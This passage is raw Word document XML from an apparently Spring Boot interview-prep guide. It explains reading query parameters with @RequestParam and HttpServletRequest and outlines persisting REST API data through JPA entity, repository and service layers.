      </w:r>
      <w:r w:rsidR="00EA2925" w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="0070C0"/>
        </w:rPr>
        <w:t>?</w:t>
      </w:r>
      <w:bookmarkEnd w:id="600"/>
    </w:p>
    <w:p w14:paraId="50006CC1" w14:textId="59FB20DE" w:rsidR="00DF5D7D" w:rsidRPr="00D774B4" w:rsidRDefault="00DF5D7D"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n Spring Boot, you can retrieve query parameters from the request using various ways, such as using the @RequestParam annotation, or directly from the HttpServletRequest.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3B59198E" w14:textId="77777777" w:rsidR="00DF5D7D" w:rsidRPr="00D774B4" w:rsidRDefault="00DF5D7D"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1. Using @RequestParam Annotation</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="64363693"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 @RequestParam annotation is used to extract query parameters from the URL. Query parameters are passed as key-value pairs in the URL (e.g., /api/messages?user=John&amp;age=30).</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0ED88504" w14:textId="77777777" w:rsidR="00DF5D7D" w:rsidRPr="00D774B4" w:rsidRDefault="00DF5D7D"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w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2373953D"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lastRenderedPageBreak/>
        <w:t>import org.springframework.web.bind.annotation.GetMapping;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="24311423"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web.bind.annotation.RequestParam;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="09DE476D"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web.bind.annotation.RestController;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2F66E9BB" w14:textId="77777777" w:rsidR="00DF5D7D" w:rsidRPr="00D774B4" w:rsidRDefault="00DF5D7D" w:rsidP="00D774B4">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="1A216934"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stController</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0ECDA132"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MessageController {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="01ADC293" w14:textId="77777777" w:rsidR="00DF5D7D" w:rsidRPr="00D774B4" w:rsidRDefault="00DF5D7D" w:rsidP="00D774B4">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="020E38DA"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GetMapping("/api/messages")</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="76A7C68E"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String getMessage(@RequestParam String user, @RequestParam int age) {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1D7931BD"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Hello, " + user + ". You are " + age + " years old.";</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4D75F11B"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40AF83A8"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285A9E9F"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n the above example:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="37840464"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questParam String user retrieves the user query parameter.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5EA946DE"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questParam int age retrieves the age query parameter.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1F10AAFC" w14:textId="77777777" w:rsidR="00DF5D7D" w:rsidRPr="00D774B4" w:rsidRDefault="00DF5D7D"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 Request:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5D7C5472"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GET /api/messages?user=John&amp;age=30</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="05C07D86" w14:textId="77777777" w:rsidR="00DF5D7D" w:rsidRPr="00D774B4" w:rsidRDefault="00DF5D7D"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Output:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="449C2491"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Hello, John. You are 30 years old.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3533B2EE" w14:textId="77777777" w:rsidR="00DF5D7D" w:rsidRPr="00D774B4" w:rsidRDefault="00DF5D7D"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2. Using @RequestParam with Default Value</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1B642FA7"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You can provide a default value for a query parameter if it's not present in the request.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6D84CF50"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GetMapping("/api/messages")</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1B12325E"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String getMessage(@RequestParam(defaultValue = "Guest") String user) {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2422EED5"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Hello, " + user;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6B311B12"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55E87C7F"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f the user parameter is not provided in the request, "Guest" will be used as the default value.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="52FCF0D2" w14:textId="77777777" w:rsidR="00DF5D7D" w:rsidRPr="00D774B4" w:rsidRDefault="00DF5D7D"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 Request:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4CAF9C94"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GET /api/messages</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0816B003" w14:textId="77777777" w:rsidR="00DF5D7D" w:rsidRPr="00D774B4" w:rsidRDefault="00DF5D7D"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Output:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="696B1930"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Hello, Guest</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4CB225D2" w14:textId="77777777" w:rsidR="00DF5D7D" w:rsidRPr="00D774B4" w:rsidRDefault="00DF5D7D"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3. Using HttpServletRequest to Retrieve Query Parameters</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6961CBE4"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You can also access query parameters directly from the HttpServletRequest.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="67D7EB87" w14:textId="77777777" w:rsidR="00DF5D7D" w:rsidRPr="00D774B4" w:rsidRDefault="00DF5D7D"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w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="617383FD"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web.bind.annotation.GetMapping;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="279B7AF8"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web.bind.annotation.RestController;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="12C951D1" w14:textId="77777777" w:rsidR="00DF5D7D" w:rsidRPr="00D774B4" w:rsidRDefault="00DF5D7D" w:rsidP="00D774B4">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="50546A9C"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javax.servlet.http.HttpServletRequest;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="518AB88A" w14:textId="77777777" w:rsidR="00DF5D7D" w:rsidRPr="00D774B4" w:rsidRDefault="00DF5D7D" w:rsidP="00D774B4">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="51D6661D"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stController</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="29185A87"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MessageController {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2655A76A" w14:textId="77777777" w:rsidR="00DF5D7D" w:rsidRPr="00D774B4" w:rsidRDefault="00DF5D7D" w:rsidP="00D774B4">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="3F045417"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GetMapping("/api/messages")</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="241AD43E"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String getMessage(HttpServletRequest request) {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="344D18DA"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String user = request.getParameter("user");</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0CBF443B"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String age = request.getParameter("age");</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="20A94787"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Hello, " + user + ". You are " + age + " years old.";</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1929D372"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74A1883D"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73F48577"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n this example, we use the HttpServletRequest object to manually retrieve the query parameters user and age.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="06B1296F" w14:textId="77777777" w:rsidR="00DF5D7D" w:rsidRPr="00D774B4" w:rsidRDefault="00DF5D7D"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4. Handling Optional Query Parameters</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="558F3CE6"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f a query parameter is optional, you can make use of @RequestParam with required = false and provide a default value if not present.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="73201885"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GetMapping("/api/messages")</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3159A5C5"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String getMessage(@RequestParam(value = "user", required = false, defaultValue = "Guest") String user) {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="57394F5B"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Hello, " + user;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4CA63943"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1FEFAC10" w14:textId="77777777" w:rsidR="00DF5D7D" w:rsidRPr="00D774B4" w:rsidRDefault="00DF5D7D"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lastRenderedPageBreak/>
        <w:t>5. Using @RequestParam Map to Retrieve All Query Parameters</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="48A8AACB"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You can retrieve all query parameters as a map of key-value pairs.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="09AD0471"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GetMapping("/api/messages")</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4D901C98"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String getMessage(@RequestParam Map&lt;String, String&gt; queryParams) {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2CA5E03E"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Query Params: " + queryParams.toString();</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="72986903"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5C0184A9" w14:textId="77777777" w:rsidR="00DF5D7D" w:rsidRPr="00D774B4" w:rsidRDefault="00DF5D7D"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 Request:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="414B28E0"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GET /api/messages?user=John&amp;age=30&amp;city=NewYork</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7B6BFF46" w14:textId="77777777" w:rsidR="00DF5D7D" w:rsidRPr="00D774B4" w:rsidRDefault="00DF5D7D"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Output:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="792D21D4"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Query Params: {user=John, age=30, city=NewYork}</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5377B687" w14:textId="77777777" w:rsidR="00DF5D7D" w:rsidRPr="00D774B4" w:rsidRDefault="00000000" w:rsidP="00D774B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E10A7C1">
          <v:rect id="_x0000_i2589" style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="32A24444" w14:textId="77777777" w:rsidR="00DF5D7D" w:rsidRPr="00D774B4" w:rsidRDefault="00DF5D7D"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Summary</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1621BBC6"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equestParam</w:t>
      </w:r>
      <w:r w:rsidRPr="00D774B4">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> is the most common and cleanest way to retrieve individual query parameters.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="272D50F4"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HttpServletRequest</w:t>
      </w:r>
      <w:r w:rsidRPr="00D774B4">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> can be used for low-level access to query parameters.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1087790F"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equestParam Map</w:t>
      </w:r>
      <w:r w:rsidRPr="00D774B4">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> allows you to capture all query parameters as a map.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="56C56358" w14:textId="3E627ED1"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28A4ABF">
          <v:rect id="_x0000_i2590" style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="2F67A4ED" w14:textId="664789AA" w:rsidR="009D6DE9" w:rsidRPr="00CE4B95" w:rsidRDefault="00D829D3">
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1"/>
        </w:numPr>
        <w:spacing w:before="0"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="0070C0"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:id="601" w:name="_Toc196308081"/>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="0070C0"/>
        </w:rPr>
        <w:t xml:space="preserve">How is the data persisted in DB with the REST </w:t>
      </w:r>
      <w:r w:rsidR="00B7714E" w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="0070C0"/>
        </w:rPr>
        <w:t>API</w:t>
      </w:r>
      <w:r w:rsidR="009D6DE9" w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="0070C0"/>
        </w:rPr>
        <w:t>?</w:t>
      </w:r>
      <w:bookmarkEnd w:id="601"/>
    </w:p>
    <w:p w14:paraId="5D896760" w14:textId="65DE54C6" w:rsidR="00DF5D7D" w:rsidRPr="00D774B4" w:rsidRDefault="00DF5D7D"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When using a REST API in a Spring Boot application, data is typically persisted in the database through several steps. The process involves receiving the data from an HTTP request (usually a POST, PUT, or PATCH request), validating it, processing it, and then saving it to the database using a persistence framework like </w:t>
      </w:r>
      <w:r w:rsidRPr="00D774B4">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>JPA (Java Persistence API)</w:t>
      </w:r>
      <w:r w:rsidRPr="00D774B4">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> or </w:t>
      </w:r>
      <w:r w:rsidRPr="00D774B4">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>Spring Data JPA</w:t>
      </w:r>
      <w:r w:rsidRPr="00D774B4">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7B4FB50C" w14:textId="77777777" w:rsidR="00DF5D7D" w:rsidRPr="00D774B4" w:rsidRDefault="00DF5D7D"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Basic Flow for Persisting Data in the Database through a REST API:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3BE19222"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Client Sends HTTP Request</w:t>
      </w:r>
      <w:r w:rsidRPr="00D774B4">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="57AFF718" w14:textId="77777777" w:rsidR="00DF5D7D" w:rsidRPr="00D774B4" w:rsidRDefault="00DF5D7D"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 client sends an HTTP request (e.g., POST, PUT) with data (usually in the body of the request) to the REST API endpoint.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="14A73E45" w14:textId="77777777" w:rsidR="00DF5D7D" w:rsidRPr="00D774B4" w:rsidRDefault="00DF5D7D"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Example: POST /api/products to create a new product.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6F0C9BC7"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Controller Receives the Request</w:t>
      </w:r>
      <w:r w:rsidRPr="00D774B4">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="51C122C5" w14:textId="77777777" w:rsidR="00DF5D7D" w:rsidRPr="00D774B4" w:rsidRDefault="00DF5D7D"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 Spring controller (annotated with @RestController) processes the incoming request.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="795FB49B" w14:textId="77777777" w:rsidR="00DF5D7D" w:rsidRPr="00D774B4" w:rsidRDefault="00DF5D7D"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 data (usually in JSON or XML format) sent by the client is mapped to a Java object, which is passed to the service layer.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="67A0A4BA"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Service Layer</w:t>
      </w:r>
      <w:r w:rsidRPr="00D774B4">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="18DC6EAE" w14:textId="77777777" w:rsidR="00DF5D7D" w:rsidRPr="00D774B4" w:rsidRDefault="00DF5D7D"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 service layer performs any business logic (e.g., validations, transformations) required before persisting the data.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5B8ECD65" w14:textId="77777777" w:rsidR="00DF5D7D" w:rsidRPr="00D774B4" w:rsidRDefault="00DF5D7D"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Example: Ensure the product name is not empty or that the product price is valid.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="106A80C6"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epository Layer</w:t>
      </w:r>
      <w:r w:rsidRPr="00D774B4">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="60DAE0AD" w14:textId="77777777" w:rsidR="00DF5D7D" w:rsidRPr="00D774B4" w:rsidRDefault="00DF5D7D"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The service layer calls a </w:t>
      </w:r>
      <w:r w:rsidRPr="00D774B4">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>repository</w:t>
      </w:r>
      <w:r w:rsidRPr="00D774B4">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> (often using Spring Data JPA or a custom JpaRepository implementation) to interact with the database.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="47EA4841" w14:textId="77777777" w:rsidR="00DF5D7D" w:rsidRPr="00D774B4" w:rsidRDefault="00DF5D7D"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A repository is typically an interface that extends JpaRepository or CrudRepository and provides basic CRUD (Create, Read, Update, Delete) methods.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="01E2C5AD"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ersistence to Database</w:t>
      </w:r>
      <w:r w:rsidRPr="00D774B4">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="73C62C13" w14:textId="77777777" w:rsidR="00DF5D7D" w:rsidRPr="00D774B4" w:rsidRDefault="00DF5D7D"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 repository uses JPA to persist the entity to the database. JPA handles the mapping between the Java object (entity) and the database table.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1495D7E2" w14:textId="77777777" w:rsidR="00DF5D7D" w:rsidRPr="00D774B4" w:rsidRDefault="00DF5D7D"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Example: A Product entity is mapped to a product table in the database.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5387B0C6"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esponse Back to the Client</w:t>
      </w:r>
      <w:r w:rsidRPr="00D774B4">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="17957433" w14:textId="77777777" w:rsidR="00DF5D7D" w:rsidRPr="00D774B4" w:rsidRDefault="00DF5D7D"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Once the data is successfully persisted, the controller can return a response to the client, typically with a success message or the created resource, along with an HTTP status code (e.g., 201 Created).</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5B977AF4" w14:textId="77777777" w:rsidR="00DF5D7D" w:rsidRPr="00D774B4" w:rsidRDefault="00DF5D7D"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 of a Simple Flow for Persisting Data in the DB:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5D54C5D8" w14:textId="77777777" w:rsidR="00DF5D7D" w:rsidRPr="00D774B4" w:rsidRDefault="00DF5D7D"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1. Product Entity (JPA Entity)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1836DC31"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javax.persistence.Entity;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0BAA0CC9"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javax.persistence.GeneratedValue;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="15B92B5A"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javax.persistence.GenerationType;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7BC0D53D"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javax.persistence.Id;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2FC1722F" w14:textId="77777777" w:rsidR="00DF5D7D" w:rsidRPr="00D774B4" w:rsidRDefault="00DF5D7D" w:rsidP="00D774B4">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="2B4633A4"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Entity</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3F37E7C1"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Product {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5EC2B466" w14:textId="77777777" w:rsidR="00DF5D7D" w:rsidRPr="00D774B4" w:rsidRDefault="00DF5D7D" w:rsidP="00D774B4">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="6E8F8C5C"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Id</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1408A76D"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GeneratedValue(strategy = GenerationType.IDENTITY)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2B0BB9C5"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Long id;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7BE284BE"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String name;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3C0B667C"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Double price;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1C676775" w14:textId="77777777" w:rsidR="00DF5D7D" w:rsidRPr="00D774B4" w:rsidRDefault="00DF5D7D" w:rsidP="00D774B4">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="45F8C720"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Getters and setters</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="73FBE55F"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219B6A0B" w14:textId="77777777" w:rsidR="00DF5D7D" w:rsidRPr="00D774B4" w:rsidRDefault="00DF5D7D"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2. Product Repository (Spring Data JPA)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="623FFDA3"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data.jpa.repository.JpaRepository;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4BF247A8" w14:textId="77777777" w:rsidR="00DF5D7D" w:rsidRPr="00D774B4" w:rsidRDefault="00DF5D7D" w:rsidP="00D774B4">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="28B3D206"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interface ProductRepository extends JpaRepository&lt;Product, Long&gt; {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="158CE96E"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59E3CBBE" w14:textId="77777777" w:rsidR="00DF5D7D" w:rsidRPr="00D774B4" w:rsidRDefault="00DF5D7D"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3. Product Service Layer</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="130C2D5D"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beans.factory.annotation.Autowired;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="55350D7E"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stereotype.Service;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6F538A44" w14:textId="77777777" w:rsidR="00DF5D7D" w:rsidRPr="00D774B4" w:rsidRDefault="00DF5D7D" w:rsidP="00D774B4">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="72EC3754"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ervice</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6B138F9E"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ProductService {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="68799536" w14:textId="77777777" w:rsidR="00DF5D7D" w:rsidRPr="00D774B4" w:rsidRDefault="00DF5D7D" w:rsidP="00D774B4">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="1B5E195A"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utowired</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="03FF5848"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ProductRepository productRepository;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="75EA79AD" w14:textId="77777777" w:rsidR="00DF5D7D" w:rsidRPr="00D774B4" w:rsidRDefault="00DF5D7D" w:rsidP="00D774B4">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
